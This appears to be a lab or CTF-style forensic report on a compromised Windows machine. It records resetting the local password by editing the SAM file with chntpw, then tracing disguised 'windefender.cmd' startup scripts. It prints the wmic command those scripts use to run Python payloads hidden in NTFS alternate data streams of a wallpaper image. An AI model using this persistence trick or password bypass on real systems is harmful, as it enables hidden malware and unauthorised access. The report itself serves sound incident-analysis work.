REPORT:
Mount the disk on kali linux
Navigate to : cd /media/kali/96DA97B8DA97935B/Windows/System32/config
Run the tool chntpw to temper the SAM file (stores password hashes):
sudo chntpw -i SAM
Run windwows and start the first overview:
strange CPU Cycles (might be unrelated afterall)
non-default desktop background on an unactivated OS
3 command prompts ( & sometimes 2 powershells) at startup
2 programms with same name in startup (windefender.cmd)
Investigation of the startup programs:
x2 windefender.cmd
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\windefender.cmd :
Content :
wmic process call create "C:\Users\myles\Pictures\wallpaper.jpeg:py.exe C:\Users\myles\Pictures\wallpaper.jpeg:stage2.py"
Permissions :
Account Unknown(S-1-5-21-2380584983-3046493731-2506961790-1000) Special
myles (DESKTOP-8DK0CQ3\myles) Special
SYSTEM Full control
Administrators (DESKTOP-8DK0CQ3\Administrators) Full control
Users (DESKTOP-8DK0CQ3\Users) Read & Execute
Everyone Read & Execute
C:\Users\myles\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windefender.cmd :
Content :
wmic process call create "C:\Users\myles\Pictures\wallpaper.jpeg:py.exe C:\Users\myles\Pictures\wallpaper.jpeg:stage2.py"
Permissions :
myles (DESKTOP-8DK0CQ3\myles) Full control
SYSTEM Full control
Administrators (DESKTOP-8DK0CQ3\Administrators) Full control
Investigation about file : "C:\Users\myles\Pictures\wallpaper.jpeg"
dir /r C:\Users\myles\Pictures
ADS file : Alternate Data Stream 539,150 wallpaper.jpeg
16,269,935 wallpaper.jpeg:py.exe:$DATA
121 wallpaper.jpeg:run.ps1:$DATA
1,644 wallpaper.jpeg:stage2.py:$DATA
Alternate Data Stream
Decryption of wallpaper.jped:run.ps1
Content :
wmic process call create "C:\Users\myles\Pictures\wallpaper.jpeg:py.exe C:\Users\myles\Pictures\wallpaper.jpeg:stage2.py"
Decryption of wallpaper.jped:stage2.py
Content :
Obfuscated python code... (stage2.py)
Decoded (stage2_decoded.py)
Decryption of "C:\WinCache\stage1.ps1":
Content :
Obfuscated python code... (stage1.py)
Decoded (stage1_decoded.py)